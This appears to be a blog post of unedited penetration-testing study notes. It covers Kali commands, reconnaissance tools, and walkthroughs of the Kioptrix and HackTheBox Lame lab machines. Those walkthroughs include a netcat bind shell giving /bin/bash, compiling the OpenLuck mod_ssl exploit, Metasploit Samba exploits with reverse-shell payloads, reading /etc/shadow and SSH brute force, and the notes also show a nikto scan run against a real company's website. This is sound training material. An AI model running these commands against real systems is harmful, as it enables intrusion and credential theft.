Featured Post
Pentest- Hands-on exp.
- Get link
- Other Apps
PENTESTING NOTES Hands-on exp.
DISCLAIMER:
- This document contains unedited notes and has not been formally proofread.
- The information provided in this document is intended to provide a basic understanding of certain technologies.
- Please exercise caution when visiting or downloading from websites mentioned in this document and verify the safety of the website and software.
- Some websites and software may be flagged as malware by antivirus programs.
- The document is not intended to be a comprehensive guide and should not be relied upon as the sole source of information.
- The document is not a substitute for professional advice or expert analysis and should not be used as such.
- The document does not constitute an endorsement or recommendation of any particular technology, product, or service.
- The reader assumes all responsibility for their use of the information contained in this document and any consequences that may arise.
- The author disclaim any liability for any damages or losses that may result from the use of this document or the information contained therein.
- The author reserve the right to update or change the information contained in this document at any time without prior notice.
- Any attempts to perform penetration testing or ethical hacking on systems or networks should be done with the explicit permission of the system/network owner. Unauthorized access is illegal and can result in serious legal consequences.
- It is important to fully understand the scope of the testing and to only test within that scope. Testing outside the agreed upon scope is considered unauthorized and may result in legal action.
- Any findings or vulnerabilities discovered during testing should be reported to the system/network owner immediately and kept confidential until a fix can be implemented.
- It is recommended to use a separate, dedicated testing environment rather than testing on a live production system to minimize the risk of accidentally causing damage or downtime.
- It is important to take steps to protect your own identity and prevent accidental data leaks or exposure of sensitive information during testing.
- It is also recommended to follow a standard code of ethics for ethical hacking and penetration testing.
REFERENCES:
- https://www.linkedin.com/learning/
- The Cyber mentor Youtube channel
- So You Want to Be a Hacker: 2023 Edition- Heath Adams
- Full Ethical Hacking Course - Beginner Network Penetration Testing (2019)
- Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 1)
- Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 2)
CONTENTS
- PENTEST PHASE STEPS
- INTRODUCTION
- BASIC COMMANDS
- KALI
- Nmap Commands
- Linux commands
- BEGINNER NETWORK PEN TESTING
- Booting Kali
- Building a script
- Executing the python file
- Building script for a scanning (socket) - Scanner.py
- The Five stages of Ethical hacking
- Reconnaissance
- Collection of information Gathering
- Searching sub domains
- Website technologies:
- BURP suite
- Nikto
- Enumeration : Preparation
- Installing Kiptrix
- NMAP scan
- Enumeration : HTTP/HTTPS
- Now trying to run enumeration using nikto - web vulnerability scanner
- Dirbuster / gobuster / dirb
- Enumeration SMB
- Metasploit Framework
- SMBCLIENT
- Enumerating SSH
- Scanning with Nessus
- Exploitation
- Netcat Reverse shell
- Staged Vs Non staged payloads
- Gaining Root with metasploit
- Manual Exploitation
- OPENLUCK exploitation
- Brute Force Attack
- Credential Stuffing and Password spraying
- Pentest Report- revisited
- Building vulnerable machine and attack machine
- HANDS ON EXPERIENCE
- 01 - VULNERABLE MACHINE: HACKTHEBOX [HTB]
- 02 - VULNERABLE MACHINE: ACTIVE DIRECTORY
- 03 - VULNERABLE MACHINE : BLUE
PENTEST PHASE STEPS
- Planning
- Obtain written permission
- Identify rules of engagement
- Set Goals
- Finalize management approval
- Discovery
- Scanning and Enumeration
- Vulnerability analysis
- Exploitation or Attack
- Demonstrate the risk to the organizations
- Business impact
- Gaining access
- Escalation privileges
- System browsing
- Install additional tools
- Determining extent of the vulnerabilities
- Reporting
INTRODUCTION
Pentesting, or penetration testing, is the practice of simulating an attack on a computer system, network, or web application to test its defenses and identify vulnerabilities. There are many resources available to learn pentesting, including online courses, books, and hands-on experience.
Here are some steps you can follow to learn pentesting:
Action Plan
Transitioning to a career in Pentesting may require some additional steps and planning, but it is certainly possible. Here is a table outlining some steps that you can take:- Familiarize yourself with the basics of computer science and networking. This can involve taking online courses or reading books to learn about topics such as data structures, algorithms, and network protocols.
- Learn a programming language such as Python or linux commands. These languages are commonly used in pentesting and can be useful for creating custom tools. You can find online tutorials and resources to help you learn these languages.
- Get hands-on experience by setting up a lab environment and practicing on vulnerable systems. There are many virtual machine images available online that you can use for this purpose.
- Join online communities and forums where you can learn from other pentesters and get feedback on your work.
- Consider obtaining a certification in pentesting, such as the Offensive Security Certified Professional (OSCP) or the Certified Ethical Hacker (CEH). These certifications can help demonstrate your knowledge and skills to potential employers.
- Look for opportunities to gain practical experience, such as internships or part-time positions, to help you build your resume and network.
- Consider seeking out additional education or training, such as a degree in computer science or cybersecurity, to help you stand out in the field.
Hands-on experience
Gaining hands-on experience is an important step in learning about pentesting and becoming proficient in the field. Here are a few ways you can gain hands-on experience:- Set up a lab environment using virtualization software such as VMware or VirtualBox. This will allow you to create and run virtual machines on your computer, which you can then use to practice on vulnerable systems.
- Download and use virtual machine images that are specifically designed for pentesting. These images often come pre-configured with vulnerable systems and tools that you can use to practice identifying and exploiting vulnerabilities.
- Participate in Capture the Flag (CTF) events and hackathons. These are competitions where teams of participants work to solve challenges and "capture" flags by finding and exploiting vulnerabilities in systems and networks.
- Seek out internships or part-time positions in the field of cybersecurity. These types of opportunities can provide you with practical experience working on real-world systems and projects.
- Search for virtual machine images that are specifically designed for pentesting. These images often come pre-configured with vulnerable systems and tools that you can use to practice identifying and exploiting vulnerabilities.
- Download and install virtualization software such as VMware or VirtualBox. This will allow you to create and run virtual machines on your computer.
- Download a vulnerable virtual machine image and import it into your virtualization software.
- Start the virtual machine and begin practicing on the vulnerable system.
Vulnerable virtual machine images
Conduct pentesting :- ethical hacking
- HackerOne
- https://www.hackerone.com/
- A platform that connects organizations with a community of hackers who can test their systems and report vulnerabilities
- Bugcrowd
- https://www.bugcrowd.com/
- A platform that crowdsources cybersecurity testing by connecting organizations with a global community of researchers
- Synack
- https://www.synack.com/
- A platform that uses a combination of artificial intelligence and a community of vetted hackers to test the security of systems
- Cobalt
- https://cobalt.io/
- A platform that connects organizations with a global community of cybersecurity researchers who can test their systems and report vulnerabilities
- HackenProof
- https://hackenproof.com/
- A platform that connects organizations with a community of hackers who can test their systems and report vulnerabilities
- Tenable
- https://www.tenable.com/
- A platform that offers a range of cybersecurity testing services, including vulnerability assessment and penetration testing
- Intigriti
- https://www.intigriti.com/
- A platform that connects organizations with a community of cybersecurity researchers who can test their systems and report vulnerabilities
- Zerocopter
- https://www.zerocopter.com/
- A platform that crowdsources cybersecurity testing by connecting organizations with a global community of researchers
- Kaspersky Secure Testing Services
- https://www.kaspersky.com/secure-testing-services
- A range of cybersecurity testing services offered by Kaspersky, including vulnerability assessment and penetration testing
- Veracode
- https://www.veracode.com/
- A platform that offers a range of cybersecurity testing services, including application security testing and secure code review
- Clearview
- https://www.clearviewinfosec.com/
- A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
- BugBountyHQ
- https://www.bugbountyhq.com/
- A platform that connects organizations with a community of cybersecurity researchers who can test their systems and report vulnerabilities
- Crowdcurity
- https://www.crowdcurity.com/
- A platform that crowdsources cybersecurity testing by connecting organizations with a global community of researchers
- Kudelski Security
- https://www.kudelskisecurity.com/services/cybersecurity-testing/
- A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
- Peerlyst
- https://www.peerlyst.com/
- A platform that connects organizations with a community of cybersecurity experts who can test their systems and report vulnerabilities
- Hacken
- https://hacken.io/
- A platform that connects organizations with a community of cybersecurity researchers who can test their systems and report vulnerabilities
- SafeHat
- https://www.safehats.com/
- A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
- Alibaba Cloud
- https://www.alibabacloud.com/security/security-testing
- A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
- Bounty Factory
- https://www.bountyfactory.io/
- A platform that connects organizations with a community of cybersecurity researchers who can test their systems and report vulnerabilities
- Symantec
- https://www.symantec.com/security-center/services/penetration-testing
- A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
- Gurucul
- https://www.gurucul.com/services/cybersecurity-services/penetration-testing.
- A provider of cybersecurity testing services, including penetration testing and vulnerability assessments
- https://www.cybrary.it/ A platform that offers free and paid online courses in cybersecurity and IT, including a course on pentesting.
- A platform that offers free and paid online courses in cybersecurity and IT, including a course on pentesting
- Pentester Academy
- https://www.pentesteracademy.com/
- A platform that offers a range of online courses in cybersecurity, including a course on pentesting
- Hackr.io
- https://hackr.io/
- A platform that aggregates online courses and tutorials in various fields, including cybersecurity
- Udemy
- https://www.udemy.com/
- An online learning platform that offers a range of courses in various fields, including cybersecurity
- edX
- https://www.edx.org/
- An online learning platform that offers a range of courses in various fields, including cybersecurity
**********************************************************************
BASIC COMMANDS
KALI
- ─(kali㉿kali)-[~]
- $ route
- $ arp -a
- $ ip n

- Create files
- echo
- cat
- touch
- Updating file
- nano
- gedit
- mousepad
- Service
- sudo service apache2 start
- sudo service apache2 stop
- Start server
- python3 -m http.server 80
- Update && Upgrade
- sudo apt update && upgrade
- git
- git clone https://github.com/Dewalt-arch/pimpmykali
- grep
- cat ip.txt | grep "64 bytes" | cut -d " " -f 4 | tr -d ":"
- Sockets
- = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # af_inet is ipv and sock.stream is a port
Nmap Commands
- nmap -sS -D 10.1.0.1
- sudo nmap --script vuln
Security Testing: Nmap Security Scanning
- dig www.google.com = gives the IP address
- TCP Scan Types
- sudo nmap -sV -O -F 10.0.2.4
- nmap saving output files
- -v = allows to see progress by nmap
How to check a website:
Linux commands
- Ls
- Cd
- Grep
- Su
- Pwd
- Whoami
- Mv
- Cp
- Mkdir
- Cat
Tools:
- Nmap
- Nikto
- Zenmap
- Threader3000
- angry IP
- NetCat
- Hydra
- Wireshark
- Dirbuster
- Burp suite
- metasploit
**********************************************************************
BEGINNER NETWORK PEN TESTING
Booting Kali
- Full Ethical Hacking Course - Beginner Network Penetration Testing (2019)
- Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 1)
- Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 2)
root@Kali - # pwd
root@Kali - # ls -la
Update the internal database
root@Kali - # updatedb
root@Kali - # locate filename.txt
Manual command
root@Kali -# man ls
Change the file permission to executable
root@Kali - # chmod +x filename.txt
Adding user
root@Kali - # adduser bob
Command to identify the root users and other users in the system using etc/passwrd
root@Kali - # cat /etc/passwrd
Shadow command: this file contains the hash function for the user which can be used to crack the password of the user.
root@Kali - # Cat /etc/shadow
Switch user
root@Kali - # su username
username@kali - #
Switching back to root
username@kali - # su -
root@Kali
Network Commands
root@Kali - # ifconfig
root@Kali - # iwconfig
Ping with count command
root@Kali - # ping -c 1 192.168.1.1
To find the broadcast id or to capture a flag who has this mac address with the ip address
root@Kali - # arp -a
Find open ports and related to
root@Kali - # netstat -ano
root@Kali - # route
root@Kali - # history
Starting Services
root@Kali - # service apache2 start
root@Kali - # service ssh start
root@Kali - # service postgresql start
root@Kali - # service apache2 stop
root@Kali - #systemctl enable ssh
root@Kali - # systemctl enable postgresql
root@Kali : ~ /Desktop# ping -c 1 192.168.1.2 > ip.txt
root@Kali : ~ /Desktop# cat ip.txt
Building a script :
Just trying to pull or grab the text using grep, cutting using delimiter -d and using space 4 then transforming : as space.
root@Kali : ~ /Desktop# Cat ip.txt | grep “64 bytes” | cut -d “ “ -f 4 | tr -d “:”
root@Kali : ~ /Desktop# nano ipsweep.sh
Python Cheat sheet;
https://darknetdiaries.com/imgs/Python-CheatSheet.pdf
Creating script
to cpy lines from nano crtl+sht+c and paste in external notepad
(root㉿kali) nano ipsweep.sh
GNU nano 7.2 ipsweep.sh
#!/bin/bash
if [ "$1" == "" ]
then
echo "You forgot an ip address"
echo "The Syntax ./ipsweep.sh 192.168.1"
else
for ip in `seq 1 254`; do
ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
done
fi
********************
Executing the python file
now running the script
root㉿kali# ./ipsweep.sh 192.168.1 > iplist.txt
doing nmap scan with the obtained ip and using it from the stored file.
root㉿kali # for ip in $(cat iplist.txt); do nmap -p 80 -T4 $ip & done
root㉿kali # gedit python101.py
#!/bin/python3
#print string
print("strings and things:")
print('hello world')
print("""hello,this is
a multi line string""")
print('\n') #new line
#math
print('math time')
print(50 + 50) #add
print('\n') #new line
#variable and methods
quote ="All if fun"
print(len(quote))
print(quote.upper)
name ="Health"
age = 29
gpa = 3.9
print(int(age))
print("may name is "+ name + " i am " + str(age) + " yrs")
print('\n') #new line
#functions
print("some fun")
def who_am_i():
name = "Health"
age = 29
print("may name is "+ name + " i am " + str(age) + " yrs")
who_am_i()
#adding parameters
def add_one_hundred(num):
print(num + 100)
add_one_hundred(100)
#boolean parameters
#relation and boolean parameters
#conditional statements
print("conditonal para")
def soda(money):
if money >= 2:
return "U have got a soda"
else:
return "No soda"
print(soda(3))
print(soda(1))
print('\n') #new line
#Lists
print("Lists")
movies = ["one","two","three","four"]
print(movies[0])
#Tuples
#looping
print("for loops")
veg = ["cucu","carr","app"]
for x in veg:
print(x)
print("while loops is true")
i = 1
while i < 10:
print(i)
i += 1
********************
Executing the python file
Giving write permission
root㉿kali # chmod +x python101.py
root㉿kali # python3 python101.py
root㉿kali # - gedit py102.py
#!/bin/python3
#importing
print("importing")
import sys #system functions and parameters
from datetime import datetime
print(datetime.now())
from datetime import datetime as dt #importing with an alias
print(dt.now())
def new_line():
print('\n')
new_line()
#advance strings
print("advance strings")
my_name = "Health"
print(my_name[0]) #first initial
sentence = "this is a sentence"
print(sentence[:4]) #first word
#Dictionaries
print("Dictionaries are with key and value")
********************Executing the python file
root㉿kali- python3 py102.py
if you want to host a simple server then
root㉿kali-# python3 -m http.server 80
root㉿kali-# install pyftpdlib
Building script for a scanning (socket) - Scanner.py
#!/bin/python3
import sys #allows to enter cmd line arguments
import socket
from datetime import datetime
#define our target
if len(sys.argv) == 2:
target = socket.gethostbyname(sys.argv[1]) #Translate a hostname to IPV4
else:
print("invalid amount of arguments")
print("syntax: python3 scanner.py <ip>")
sys.exit()
#add a pretty banner
print("-" * 50)
print("Scanning target "+target)
print("Time started: "+str(datetime.now()))
print("-" * 50)
try:
for port in range(50,85):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(1) #is a float
result = s.connect_ex((target,port)) #returns error indicator
print("Checking port {}".format(port))
if result == 0:
print("Port {} is open".format(port))
s.close()
except keyboardInterrupt:
print("\nExiting program.")
sys.exit()
except socket.gaierror:
print("Hostname could not be resolved.")
sys.exit()
except socket.error:
print("couldnt connect to server")
sys.exit()
*****root㉿kali-# python3 scanner.py 192.168.1.1
The Five stages of Ethical hacking
- Reconnaissance
- Active & passive
- Scanning & Enumeration
- Nmap, Nessus, Nikito, etc.
- Gaining Access
- exploitation
- Maintaining Access
- Covering Tracks
Reconnaissance
Passive
- Location information
- Job information
- Web/ Host
- Target validation
- WHOIS, nslookup, dnsrecon
- Finding subdomains
- google FU, dig, nmap, sublister, Bluto, crt.sh
- Fingerprinting
- nmap, wappalyzer, whatweb, builtwith, netcat
- Data Breaches
- haveibeenpwned, breach-prase, weleakinfo
BUG-Crowd programs
- https://bugcrowd.com/programs
- example : tesla.com
Here are a few places where you can find bug bounty programs:
Bugcrowd (https://www.bugcrowd.com/): Bugcrowd is another platform that connects security researchers with organizations that offer bug bounty programs. Many companies in industries such as finance, healthcare, and technology use Bugcrowd to run their bug bounty programs.
Open Bug Bounty (https://www.openbugbounty.org/): Open Bug Bounty is a non-profit organization that aims to make the internet a safer place by encouraging website owners to run a public bug bounty program. The organization provides a platform for security researchers to report vulnerabilities they find in participating websites.
BountyFactory (https://bountyfactory.io/): BountyFactory is a platform that aggregates bug bounty programs from various companies, making it easy for security researchers to find and participate in programs.
Synack (https://www.synack.com/): Synack is a company that provides managed crowdsourced security testing services to organizations. Security researchers can apply to become part of Synack's "Red Team" and participate in private bug bounty programs for Synack's clients.
Collection of information Gathering
Discovering email address:
Checking email id are valid
Hunting Breached Credential's
- ─$ sudo apt install sublist3r
- sublist3r -d tesla.com
- https://crt.sh/
- Searching tesla.com
- https://github.com/OWASP/Amass
- The OWASP Amass Project has developed a tool to help information security professionals perform network mapping of attack surfaces and perform external asset discovery using open source information gathering and active reconnaissance techniques.
- https://github.com/tomnomnom/httprobe
- Take a list of domains and probe for working http and https servers.
Website technologies:
- https://builtwith.com/
builtwith.com |
- Wappalyzer:
- Find out what websites are built with https://www.wappalyzer.com
- The Wappalyzer APIs provide instant access to website technology stacks, company and contact details, social media profiles, email verification and more
wappalyzer |
- WhatWeb Usage Example
- ─$ whatweb tesla.com
https://www.kali.org/tools/theharvester/
- root㉿kali-# theHarvester -h
- root㉿kali-# theHarvester -d apple.com -l 500 -b bing
BURP suite
- Community edition
- https://portswigger.net/burp/releases/professional-community-2023-1-2requestededition=community&requestedplatform=
- Setting up Burp suite
- opening the burpsuite
- next opening the Firefox, hamburger menu, settings, network settings
- manual proxy configuration
- http proxy : 127.0.0.1 Port:8080
- same for https proxy & SOCKS host
- New tab - https://burp/
Burp suite |
- download the CA certificate and save
- Go to settings- Privacy & Security - click view certificate - import - select the file - click the 2 check boxes and ok
- Open the Burp suite- Proxy tab - click intercept on.
- then open browser - tesla.com
- Burp suit/ Proxy Tab - captures
- Burp suit/ Target Tab
Burp suite |
Nikto
- root@kali:~# nikto -h https://tesla.com
GOOGLE FU
search query examples
- site:tesla.com # here you are searching against the site
- site:tesla.com -www # removing "WWW"
- site:tesla.com -www -r # removing both - "www, ir"
- site:tesla.com filetype:pdf
Social Media:
Enumeration : Preparation
Installing Kiptrix
- Original source
- https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
- Modified version
- https://tcm-sec.com/kioptrix
- https://drive.google.com/drive/folders/1z923e0icfJADbhgS0Qfaxuez-GJTWvjt
- Setting all the virtualbox machine under "NATNETWORK"
Kioptrix vul machine is turned on
Kioptrix_Level_1.
https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
# arp-scan -l
ifconfig
Scanning Starts
root@kali:~# netdiscover -r 192.168.1.0/24
- Getting the kioptrix ip address to perform attack
NMAP scan
- root@kali:~# nmap -T4 -p- 192.168.202.130
- nmap -sU -T4 -p 192.168.202.130
Now after getting the open port details
- root@kali:~# nmap -A -T4 -p22,80,111,139,443,32768 192.168.202.130
- Port 22 is open SSH service
- Port 80 open Apache https 1.3.20
- Port 139 open netbios-ssn samba
- Port 443 open ssl/https apache/1.3.20
Enumeration : HTTP/HTTPS
Now 192.168.202.130 is executed in the browser
- A apache test page is displayed as below [Kioptrix vul machine]
Now creating report
Take screenshot and provide details
For IP address 192.168.202.130
PORT open disclosure |
Now clicking on the manual link lead to 404
- we are able to see the version of apache and server name revealed and the port number all these are internal information which are exposed.
Information Disclosure : - 404 page |
Now trying to run enumeration using nikto - web vulnerability scanner
- root@kali:~# Nikto -h 192.168.202.130
- also try - Nikto -h http://192.168.202.130
nikto |
- able to read the scan report what are the vulnerabilities listed from the scan results
- anti-clickjacking not present
- x-xss protection header not defined
- apache outdated
- mod_ssl outdated
Dirbuster / gobuster / dirb
kali ~# dirbuster&dirbuster |
The Dirbuster window opens up
- Target url http://192.168.202.130:80/
- File with list of dirs/files: Browse - click up- usr/ share/wordlists/dirbuster/
- Select any file - for time being use- directory-list-lowercase-2-3-small.txt
- File extension : php,asa,sql,zip,tar,pdf,txt,bak - add what more file extensions need to be searched.
- file extensions are selected based on the base server is on php
Dirbuster window |
internal host |
- checking the comments for keys, passwords, hints, dir structure or any other information useful for gaining access in the source code
Dirbuster result |
usage_201911 html |
Enumeration SMB
Now trying to enumerate SMB on port 139Metasploit Framework is started
msf5> search smb
msfconsole search smb |
SMBCLIENT is started
root@kali:~# smbclient -L \\\\192.168.57.134\\Enumerating SSH
We have not got the password and hence terminating - CTRL + C
Researching potential vulnerabilities
Pentest Report - Notes- https://www.exploit-db.com/exploits/764
- https://github.com/heltonWernik/OpenLuck
Apache 1.3.20 vulnerabilities
Results received: -- https://www.exploit-db.com/exploits/19975
- https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-369927/Apache-Http-Server-1.3.20.html
Samba 2.2.1 vulnerabilities
- https://www.rapid7.com/db/modules/exploit/linux/samba/trans2open/
- Module Options
- To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':
- msf > use exploit/linux/samba/trans2open
- msf exploit(trans2open) > show targets
- ...targets...
- msf exploit(trans2open) > set TARGET < target-id >
- msf exploit(trans2open) > show options
- ...show and set options...
- msf exploit(trans2open) > exploit
Now using Kali we can search the exploit
kali:~# searchsploit samba 2.2
kali:~# searchsploit mod ssl 2
Assessment Report |
Scanning with Nessus
Downloading the package
SCAN results - analysis
Exploitation
Netcat Reverse shell - uses internal n/w
Netcat Bind shell - uses external n/w
- From Victim machine 4445 is opened:
- From attacker machine :
msf5 exploit(linux/samba/trans2open) > options
Manual Exploitation
OPENLUCK exploitation
Brute Force Attack
ssh - brute force attack
msf5 auxiliary(scanner/ssh/ssh_login)> set threads 10
msf5 auxiliary(scanner/ssh/ssh_login)> run
Credential Stuffing and Password spraying
FoxyProxy Standard
Now in intruder tab -> Positions Tab -> click clear button.
Payload set 1 -> Paste username
Password Spraying :
Pentest Report- revisited
Building vulnerable machine and attack machine.
Downloading ISO image from Microsoft for Virtual Box
windows-10-enterprise
windows-server-2016
Vulnserver
Immunity Debugger
Buffer overflow
Steps to conduct a Buffer overflow
- Spiking
- Fuzzing
- Finding the offset
- Overwriting the EIP
- Finding Bad Characters
- Finding Right Modules
- Generating shellcode
Spiking
- Starting Vulnserver with admin access.
- Starting Immunity debugger with admin access - File -> attach -> Vulnserver; Then click run
- Finding ip address = 10.0.2.5
Starting Kali linux machine
FUZZING
Finding the Offset
Overwriting the EIP
Finding the Right Module
Generating Shellcode and Gaining Root
01 - VULNERABLE MACHINE: HACKTHEBOX [HTB]
Taking any active machine
Scanning for the ip address of the HTB
Nmap -sU T4 10.10.10.133 #this is udp scan
Nmap -T4 -p- 10.10.10.133 # this is tcp scan
Inference - when the results show 22/tcp & 80/tcp find some sort of exploit that leads to credentials. That credentials will lead to login at port 22
Also chance for getting remote exploitation on port 80
Pasting on the browser 10.10.10.133 leads to openpage
Viewing page source
Page source information show - http://onetwoseven.htb:60080
Changing localDNS, such that the page can be accessed when visiting http://onetwoseven.htb:60080
root@kali:~#Gedit /etc/hosts
Adding the ip address and http://onetwoseven.htb:60080
Now entering http://onetwoseven.htb
root@kali:~# nikto -h onetwoseven.htb
Results - server apache 2.4.5
Server leaks via etags
root@kali:~# sftp ots-5MmY2Y@onetwoseven.htb
Noe after posting the password , accessed is gained
sftp> ls
sftp> get index.html
root@kali:~# cat index.html
Based on the information getting into the url http://onetwoseven.htb/dist/img
root@kali:~# gedit index.html
Changing the image to donkey-ddos-jpg
sftp> put index.html
Recheck the url , now donkey image is displayed
root@kali:~# dirbuster
Target url 192.168.202.130
File with list of dirs/files: Browse - click up- usr/ share/wordlists/dirbuster/
Select any file - for time being use- directory-list-lowercase-2-3-small.txt
File extension : php,asa,sql,zip,tar,pdf,txt,bak - add what more file extensions need to be searched.
Exploitation, Shells, Credential stuffing
Netcat Reverse shell
Target machine to Attackbox
Netcat Bind shell
Attackbox connected to Target machine
From Victim machine 4445 is opened:
root@kali:~# nc -lvp 4445 -e /bin/bash
From attacker machine :
root@kali:~# nc 192.168.202.129 4445
Connection is established and able to connect to the shell
Apache 1.3.20 vulnerabilities
- root@kali:~# curl --head 192.168.202.130
- Now taking a note
- Server header info disclosure(low)
- 192.168.202.130 : Copy IP address and paste screenshot
- Default 404 info disclosure (low)
- 192.168.202.130/asdewgfnk : Copy IP address and paste screenshot
- root@kali:~# nmap –script=ssl-enum-ciphers -p 443 192.168.202.130
- Now taking a note
- Weak Ciphers
- 192.168.202.130 : Copy IP address and paste screenshot :- least strength F
- Now search for Apache 1.3.20 vulnerabilities on web
- Exploit Database https://www.exploit-db.com/
- root@kali:~# searchsploit apache
- Now trying to get more information on Port 139 open Samba smdb
- root@kali:~# smbclient -L \\\\192.168.202.130
- root@kali:~# smbclient -L \\\\192.168.202.130\\IPC$
- NESSUS scan report vulnerability - SMB Signing not required shown as vul.
- Now root@kali:~# msfconsole
- msf5> search smb
- msf5> use auxiliary/scanner/smb/smb_version
- msf5 auxiliary(scanner/smb/smb_version) > options
- msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.202.130
- msf5 auxiliary(scanner/smb/smb_version) > run
- root@kali:~# searchsploit samba 2.2
- There are more trans2open exploits
- msf5 auxiliary(scanner/smb/smb_version) > search trans2open
- msf5 auxiliary(scanner/smb/smb_version) > info exploit/linux/samba/trans2open
Now Continuation from earlier Apache searching the web for OPENLUCK vulnerabilities
root@kali:~# git clone https://github.com/heltonWernik/OpenLuck
Install ssl-dev library
apt-get install libssl-dev
gcc -o OpenFuck OpenFuck.c -lcrypto
Running the Exploit
./OpenFuck
/OpenFuck 0x6b 192.168.202.130 -c 40
After running the exploit the root privilege is gained
Now Trying to enumerate from the root using below commands
Arp -a
Route
Sudo -l
Pwd # working directory
Trying to get password hashes
Cat /etc/shadow
Trying here to find some other connected sub networks using the above commands also.
Now root@kali:~# msfconsole
msf5>
msf5> search smb
msf5> use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > options
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.202.130
msf5 auxiliary(scanner/smb/smb_version) > run
Searching for samba 2.2.1a exploit on google
msf5 auxiliary(scanner/smb/smb_version) > search trans2open
msf5 auxiliary(scanner/smb/smb_version) > use exploit/linux/samba/trans2open
Msf5 exploit(linux/samba/trans2open) > set rhosts 192.168.202.130
msf5 exploit(linux/samba/trans2open) > info
msf5 exploit(linux/samba/trans2open) > run
msf5 exploit(linux/samba/trans2open) > ^C # here there no no connection or exploit not working, hence looking for other options
msf5 exploit(linux/samba/trans2open) > options
msf5 exploit(linux/samba/trans2open) > set payload linux/x86/shell_reverse_tcp
This is the non staged payload where is he no /slash
For Staged payload there is / after shell
msf5 exploit(linux/samba/trans2open) > options
msf5 exploit(linux/samba/trans2open) > run
It was success and root access is achieved
Now connecting to HackTheBox HTB
Retired machine - Lame - 10.10.10.3
root@kali :~ # nmap -T4 -p- -A 10.10.10.3
22/tcp open ssh : When SSH is open brute force can be tried to open
139, 445 - netbios samba 3.0.20-Debian
root@kali :~ # ftp 10.10.10.3
Username and password :- anonymous
ftp > help
ftp> ls
Checking for exploit :- vsftpd 2.3.4 on google
Checking for exploit : - smbd 3.0.20 on google - got some info on username map script
Opening metasploit to search for username map script
Now root@kali:~# msfconsole
msf5>search usermap
msf5 exploit(multi/samba/usermap_script) > set rhosts 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > run
cat /etc/shadow/
arp -a
route
Check all the files to see for important data and CTF - catch the flag required to search all the files to find the CTF
****************************************************************************
02 - VULNERABLE MACHINE: ACTIVE DIRECTORY
Downloading ISO image from Microsoft
Setting up the VM installation:
WIN 2016 SERVER
- While setting up 2016 server, go to setting and remove the floppy drive component
- Setting up compromised password :- Admin : Password1
- PC to be discoverable = Yes
- Configure this local server
- Add roles & features
- Role based,next & next
- Active directory domain service - add features
- Next, next, install- close
- Click on the flag - Promote this server domain controller
- Add new forest
- Setting up compromised password :- Admin : Pass$123
- Next,next,next,next,install, after reboot
- Tools p Active directory Users and computers
- Marvel.local - users- rgt Click- new user.
- CMD -ipconfig
- After adding fcastle to domain
- Server manager - Files shares and services - shares
- Top right- Tasks- New share - SMB share quick- click next
- select custom folder- then folder created, next, then, select enable access-based enumeration
- Next, then click create
WIN 2010 ENTERPRISE
- Domain join instead
- Just name localfrank/Password2, next-
- Skip cortna
- Uncheck all then accept
- Rename the PC
- Network & internet settings :- change adaptor settings -properties - double click internet protocol version4 -
- Use the following DNS server address - copy the IP address from win 2016 serv
- Search domain - click connect -
- Join the domain - marvel.local
- fcastle/std user
- After creating share folder, mapping the folder
- Under mypc - then- computer options- map the drive - \\HYDRA\hackme.
Attack to be performed - LLMNR/NBT-NS poisoning
03 - VULNERABLE MACHINE : BLUE
meterpreter/reverse_tcp |
Comments
Post a Comment